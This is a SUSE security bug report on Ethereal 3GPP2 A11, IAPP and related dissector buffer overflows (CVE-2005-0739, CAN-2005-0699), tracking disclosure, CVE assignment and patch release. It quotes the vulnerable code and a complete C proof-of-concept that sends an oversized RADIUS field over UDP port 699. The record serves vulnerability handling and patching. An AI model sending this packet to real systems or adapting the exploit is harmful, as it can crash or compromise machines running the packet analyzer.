Bug 71777 (CVE-2005-0739)

Summary: VUL-0: CVE-2005-0739: ethereal buffer overflow
Product: [Novell Products] SUSE Security Incidents Reporter: Ludwig Nussel <lnussel>
Component: IncidentsAssignee: Security Team bot <security-team>
Status: RESOLVED FIXED QA Contact: Security Team bot <security-team>
Severity: Normal    
Priority: P5 - None CC: security-team
Version: unspecified   
Target Milestone: ---   
Hardware: Other   
OS: All   
Whiteboard: CVE-2005-0739: CVSS v2 Base Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P) CVSSv2:NVD:CVE-2005-0699:7.5:(AV:N/AC:L/Au:N/C:P/I:P/A:P)
Found By: Other Services Priority:
Business Priority: Blocker: ---
Marketing QA Status: --- IT Deployment: ---
Attachments: ethereal-3g-a11.c

Description Ludwig Nussel 2005-03-09 10:51:40 UTC 
We received the following report via bugtraq.
The issue is public.

Date: Tue, 8 Mar 2005 02:16:24 +0100
From: LSS Security <exposed@lss.hr>
To: bugtraq@securityfocus.com
Subject: Ethereal remote buffer overflow
User-Agent: Mutt/1.5.6i
X-Spam-Level: 


			LSS Security Advisory #LSS-2005-03-04
			       http://security.lss.hr

---

Title			:  Ethereal remote buffer overflow
Advisory ID		:  LSS-2005-03-04
Date			:  08.03.2005 
Advisory URL:		:  http://security.lss.hr/en/index.php?page=exp 
Impact			:  Stack overflow and possible code execution
Risk level		:  High 
Vulnerability type	:  Remote 
Vendors contacted	:  Yes

---




===[ Overview 

Ethereal is used by network professionals around the world for troubleshooting, 
analysis, software and protocol development, and education. It has all of the 
standard features  you would expect in a protocol analyzer, and several 
features not seen in any other product. Its open source license allows talented 
experts in the networking community to add enhancements. It runs on all popular 
computing platforms, including Unix, Linux, and Windows.



===[ Vulnerability

There is remote buffer overflow vulnerability in Ethereal dissector for 
CDMA2000 A11 packets. Vulnerability is located in dissect_a11_radius() function 
in packet-3g-a11.c used for RADIUS authentication dissection. Number of bytes 
that will be copied from packet to buffer in stack is taken from packet itself. 
16 bytes are reserved for that buffer, and string length can be up to 256 bytes 
(unsigned char), so is possible to overflow local variables and return address. 


packet-3g-a11.c:
----------------
#define MAX_STRVAL 16
...
dissect_a11_radius( tvbuff_t *tvb, int offset, proto_tree *tree, int app_len)
{
...
  size_t     radius_len;
  ...
  guchar     str_val[MAX_STRVAL]; 
  ...
  radius_len = tvb_get_guint8(tvb, offset + 1);
  ...
  strncpy(str_val, tvb_get_ptr(tvb,offset+2,radius_len-2), radius_len-2); 
...
}
----------------

A similar vulnerability was also found in same function few lines below where 
RADIUS attributes are copied to stack.

packet-3g-a11.c:
----------------
#define MAX_STRVAL 16
...
dissect_a11_radius( tvbuff_t *tvb, int offset, proto_tree *tree, int app_len)
{
...
  guint      attribute_len;
  ...
  guchar     str_val[MAX_STRVAL];
  ...
  attribute_len = tvb_get_guint8(tvb, offset + radius_offset + 1);
  ...
  case ATTR_TYPE_STR:
  strncpy(str_val,tvb_get_ptr(tvb,offset+radius_offset+2,attribute_len - 2),
         attribute_len - 2); 

...
}
----------------



===[ Affected versions

All versions after 3G-A11 dissector was added to CVS including latest 0.10.9.
Vulnerability was tested with latest Ethereal on Linux and Windows.



===[ Fix

It seems that that they have fixed that vulnerability just few days ago, 
and new version will probably be available soon from http://www.ethereal.com.



===[ PoC Exploit

Exploit is in attachment, and URL http://security.lss.hr/en/PoC/ 



===[ Credits

Credits for this vulnerability goes to Leon Juranic. 



===[ LSS Security Contact
 
 LSS Security Team, <eXposed by LSS>
 
 WWW    : http://security.lss.hr
 E-mail : security@LSS.hr
 Tel	: +385 1 6129 775
  




/*
 * 
 * Ethereal 3G-A11 remote buffer overflow PoC exploit 
 * --------------------------------------------------
 * Coded by Leon Juranic <ljuranic@lss.hr> 
 * LSS Security <http://security.lss.hr/en/>
 * 
 */ 

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>


main (int argc, char **argv)
{
	int sock;
	struct sockaddr_in sin;
	unsigned char buf[1024];
	char bla[200];

	sock=socket(AF_INET,SOCK_DGRAM,0);

	sin.sin_family=AF_INET;
	sin.sin_addr.s_addr = inet_addr(argv[1]);
	sin.sin_port = htons(699);

	buf[0] = 22;
	memset(buf+1,'A',19);
	buf[20] = 38;
	*(unsigned short*)&buf[22] = htons(100); 
	*(unsigned short*)&buf[28] = 0x0101;
	buf[30] = 31;
	buf[31] = 150;   // len for overflow...play with this value if it doesn't work

	memset (bla,'B',200);
	strncpy (buf+32,bla,180);
	
	sendto (sock,buf,200,0,(struct sockaddr*)&sin,sizeof(struct sockaddr));
}
Comment 1 Ludwig Nussel 2005-03-09 10:54:01 UTC 
Additional information from vendor-sec: 
 
Date: Tue, 08 Mar 2005 13:27:08 -0600 
From: Gerald Combs <gerald@ethereal.com>                                                                                 
To: vendor-sec@lst.de 
Subject: [vendor-sec] Upcoming Ethereal release (0.10.10) fixes three 
vulnerabilities                                    
User-Agent: Mozilla Thunderbird 1.0 (Windows/20041206) 
X-Spam-Level: 
 
Ethereal 0.10.10 is scheduled to be released on Thursday, March 10.  It 
addresses the following security issues: 
 
  The Etheric dissector was susceptible to a buffer overflow. 
  Versions affected: 0.10.7 to 0.10.9 
  Fixed in revision: 13176 
 
  The GPRS-LLC dissector could crash if the "ignore cipher bit" option 
  was enabled. 
  Versions affected: 0.10.7 to 0.10.9 
  Fixed in revisions: 13386 (further improvements in 13549 and 13571) 
 
  The 3GPP2 A11 dissector was susceptible to a buffer overflow. 
  Versions affected: 0.10.3 to 0.10.9 
  Fixed in revision: 13574 
 
Ethereal's SVN repository can be browsed online at 
 
    http://anonsvn.ethereal.com/viewcvs/viewcvs.py/ 
 
Information on obtaining the source code can be found at 
 
    http://www.ethereal.com/development.html#source 
 
ETA on the official release of 0.10.10 is Date: Tue, 08 Mar 2005 13:27:08 -0600 
From: Gerald Combs <gerald@ethereal.com>                                                                                 
To: vendor-sec@lst.de 
Subject: [vendor-sec] Upcoming Ethereal release (0.10.10) fixes three 
vulnerabilities                                    
User-Agent: Mozilla Thunderbird 1.0 (Windows/20041206) 
X-Spam-Level: 
 
Ethereal 0.10.10 is scheduled to be released on Thursday, March 10.  It 
addresses the following security issues: 
 
  The Etheric dissector was susceptible to a buffer overflow. 
  Versions affected: 0.10.7 to 0.10.9 
  Fixed in revision: 13176 
 
  The GPRS-LLC dissector could crash if the "ignore cipher bit" option 
  was enabled. 
  Versions affected: 0.10.7 to 0.10.9 
  Fixed in revisions: 13386 (further improvements in 13549 and 13571) 
 
  The 3GPP2 A11 dissector was susceptible to a buffer overflow. 
  Versions affected: 0.10.3 to 0.10.9 
  Fixed in revision: 13574 
 
Ethereal's SVN repository can be browsed online at 
 
    http://anonsvn.ethereal.com/viewcvs/viewcvs.py/ 
 
Information on obtaining the source code can be found at 
 
    http://www.ethereal.com/development.html#source 
 
ETA on the official release of 0.10.10 is Thursday, March at 3:00 
PM CST (21:00 UTC).  Notification will be made via the ethereal-announce 
mailing list and the web site (http://www.ethereal.com). 
 
Please don't hesitate to contact me if you have any questions.Thursday, March 
at 3:00 
PM CST (21:00 UTC).  Notification will be made via the ethereal-announce 
mailing list and the web site (http://www.ethereal.com). 
 
Please don't hesitate to contact me if you have any questions.
Comment 2 Klaas Freitag 2005-03-09 11:06:08 UTC 
Changed version to final
Comment 3 Ludwig Nussel 2005-03-09 14:08:58 UTC 
Date: Wed, 9 Mar 2005 08:59:39 -0500 
From: Josh Bressers <bressers@redhat.com>                                                                                
 
>   The 3GPP2 A11 dissector was susceptible to a buffer overflow. 
>   Versions affected: 0.10.3 to 0.10.9 
>   Fixed in revision: 13574 
 
This issue has been noticed and is CAN-2005-0699. 
 
I'll mail Steve about the other two since they're basically public.
Comment 4 Ludwig Nussel 2005-03-10 08:31:48 UTC 
Date: Wed, 9 Mar 2005 16:56:22 -0500 
From: Josh Bressers <bressers@redhat.com>                                                                                
To: Gerald Combs <gerald@ethereal.com> 
Cc: vendor-sec@lst.de 
Subject: Re: [vendor-sec] Upcoming Ethereal release (0.10.10) fixes three 
vulnerabilities                                
 
On Tue, Mar 08, 2005 at 01:27:08PM -0600, Gerald Combs wrote: 
> Ethereal 0.10.10 is scheduled to be released on Thursday, March 10.  It 
> addresses the following security issues: 
> 
>   The Etheric dissector was susceptible to a buffer overflow. 
>   Versions affected: 0.10.7 to 0.10.9 
>   Fixed in revision: 13176 
 
This issue is CAN-2005-0704 
 
> 
>   The GPRS-LLC dissector could crash if the "ignore cipher bit" option 
>   was enabled. 
>   Versions affected: 0.10.7 to 0.10.9 
>   Fixed in revisions: 13386 (further improvements in 13549 and 13571) 
 
This issue is CAN-2005-0705 
 
> 
>   The 3GPP2 A11 dissector was susceptible to a buffer overflow. 
>   Versions affected: 0.10.3 to 0.10.9 
>   Fixed in revision: 13574 
 
This issue is CAN-2005-0699 
 
 
-- 
    JB
Comment 5 Ludwig Nussel 2005-03-10 08:40:09 UTC 
Date: Wed, 9 Mar 2005 02:33:58 +0100 
From: LSS Security <exposed@lss.hr> 
To: bugtraq@securityfocus.com 
Subject: RE: Ethereal remote buffer overflow - addon 
 
Just a little trick to overflow more stack memory in Ethereal. 
It is possible to overflow stack with more than 255 - 2 bytes. If radius_len 
is set to 1, in strncpy() line it is subtracted by two and it will be -1 
(0xffffffff -> 4294967295 (unsigned long)). 
 
packet-3g-a11.c: 
---------------- 
#define MAX_STRVAL 16 
... 
dissect_a11_radius( tvbuff_t *tvb, int offset, proto_tree *tree, int app_len) 
{ 
... 
  size_t     radius_len; 
  ... 
  guchar     str_val[MAX_STRVAL]; 
  ... 
  radius_len = tvb_get_guint8(tvb, offset + 1); 
  ... 
  strncpy(str_val, tvb_get_ptr(tvb,offset+2,radius_len-2), radius_len-2); 
... 
} 
---------------- 
 
 
------------------------------------------ 
Leon Juranic, LSS Security 
http://security.lss.hr
Comment 6 Ludwig Nussel 2005-03-10 08:42:23 UTC 
Just in case we need to mention it in any advisory: 
 
Date: Tue, 8 Mar 2005 23:35:01 -0300 
From: Diego Giagio <dgiagio@irion.com.br>                                                                                
To: bugtraq@securityfocus.com 
Cc: Gerald Combs <gerald@ethereal.com> 
Subject: Re: Ethereal remote buffer overflow                                                                             
 
> --- 
> 
> Title                 :  Ethereal remote buffer overflow 
> Advisory ID           :  LSS-2005-03-04 
> Date                  :  08.03.2005 
> Advisory URL:         :  http://security.lss.hr/en/index.php?page=exp 
> Impact                        :  Stack overflow and possible code execution 
> Risk level            :  High 
> Vulnerability type    :  Remote 
> Vendors contacted     :  Yes 
>   
> --- 
 
This vulnerability was first discovered by me, on 01/Mar/2005. The vendor was 
immediatelly contacted, as you can see below: 
 
http://marc.theaimsgroup.com/?l=ethereal-dev&m=110973103628823&w=2 
http://marc.theaimsgroup.com/?l=ethereal-dev&m=110973731214683&w=2 
 
This vulnerability wouldn't made public until the next Ethereal's version 
comes out (hopefully 10 or 11 this month), as I dealed with the vendor. 
 
A proof-of-concept remote root exploit was made by me, but will only be 
publicized on schedule. 
 
 
Diego Giagio
Comment 7 Ludwig Nussel 2005-03-11 08:26:17 UTC 
Date: Thu, 10 Mar 2005 20:14:37 -0600 
From: Gerald Combs <gerald@ethereal.com>                                                                                 
To: Josh Bressers <bressers@redhat.com> 
Cc: vendor-sec@lst.de 
Subject: Re: [vendor-sec] Upcoming Ethereal release (0.10.10) fixes three                                                
 vulnerabilities 
 
Josh Bressers wrote: 
> On Tue, Mar 08, 2005 at 01:27:08PM -0600, Gerald Combs wrote: 
> 
>>Ethereal 0.10.10 is scheduled to be released on Thursday, March 10.  It 
>>addresses the following security issues: 
> ... 
 
Thanks.  Unfortunately, we have one more issue: 
 
  The IAPP dissector is vulnerable to a buffer overflow. 
  Versions affected: 0.9.1 to 0.9.9 
  Fixed in revision: 13707 
 
The release has been postponed to tomorrow (March 11) at 11:00 AM CST 
(17:00 GMT).
Comment 8 Ludwig Nussel 2005-03-14 09:11:48 UTC 
From: Martin Schulze <joey@infodrom.org> 
 
Sune Kloppenborg Jeppesen wrote: 
> Any CVE id for the latest issue? 
> 
> On Friday 11 March 2005 03:14, Gerald Combs wrote: 
> > Thanks.  Unfortunately, we have one more issue: 
> > 
> >   The IAPP dissector is vulnerable to a buffer overflow. 
> >   Versions affected: 0.9.1 to 0.9.9 
> >   Fixed in revision: 13707 
 
Please use CAN-2005-0739 
 
Regards, 
 
        Joey
Comment 9 Ludwig Nussel 2005-03-14 16:43:01 UTC 
From: Gerald Combs <gerald@ethereal.com> 
 
That was a typo.  It should be 0.9.1 to 0.10.9. 
 
Sune Kloppenborg Jeppesen wrote: 
> Seems like the affected version is wrong here and on the CVE entry.
Comment 10 Marcus Meissner 2005-03-15 08:49:23 UTC 
Created attachment 31679 [details]
ethereal-3g-a11.c

sample exploit. be careful, might vcontain backdoors
Comment 11 Ludwig Nussel 2005-03-15 12:45:25 UTC 
swampid 622
Comment 12 Ludwig Nussel 2005-03-17 09:37:34 UTC 
http://www.ethereal.com/appnotes/enpa-sa-00018.html mentiones additional 
non-security bugs that could make ethereal crash.
Comment 13 Ludwig Nussel 2005-04-07 12:20:14 UTC 
ping
Comment 14 Petr Ostadal 2005-04-07 13:41:10 UTC 
Sorry SLES9-SP2 has higher priority.

For all that I try backporting patches form stable, but it consumes a lot of
time, because the version in older distros is too different ;(.
Comment 15 Marcus Meissner 2005-04-08 12:35:28 UTC 
i think if it is too hard to backport we can also get a waiver to do a version 
upgrade of ethereal.
Comment 16 Petr Ostadal 2005-04-13 15:00:29 UTC 
Fixed security bugs in 3GPP2 A11, IAPP, sFlow dissectors (CAN-2005-0699,
CAN-2005-0739) and submited for sles8, 8.2, 9.0, 9.1, sles9 and 9.2
Comment 17 Thomas Biege 2005-04-21 11:11:49 UTC 
/work/src/done/PATCHINFO/ethereal.patch.box
/work/src/done/PATCHINFO/ethereal.patch.maintained
Comment 18 Ludwig Nussel 2005-04-22 15:54:49 UTC 
packages released
Comment 19 Thomas Biege 2009-10-13 21:10:19 UTC 
CVE-2005-0739: CVSS v2 Base Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)